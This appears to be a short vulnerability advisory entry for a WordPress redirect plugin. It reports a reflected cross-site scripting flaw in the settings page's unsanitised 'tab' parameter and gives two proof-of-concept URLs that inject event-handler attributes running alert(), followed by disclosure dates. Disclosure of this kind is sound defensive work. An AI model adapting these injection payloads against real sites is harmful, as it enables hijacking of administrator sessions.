The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue
https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab=" onMouseOver="alert(1); https://example.com/wp-admin/options-general.php?page=moove-redirect-settings&tab="+style%3D"animation-name%3Aspinner"+onanimationstart%3D"alert(%2FXSS%2F)
0xB9
Yes
2021-04-23 (about 1 years ago)
2021-04-23 (about 1 years ago)
2021-04-24 (about 1 years ago)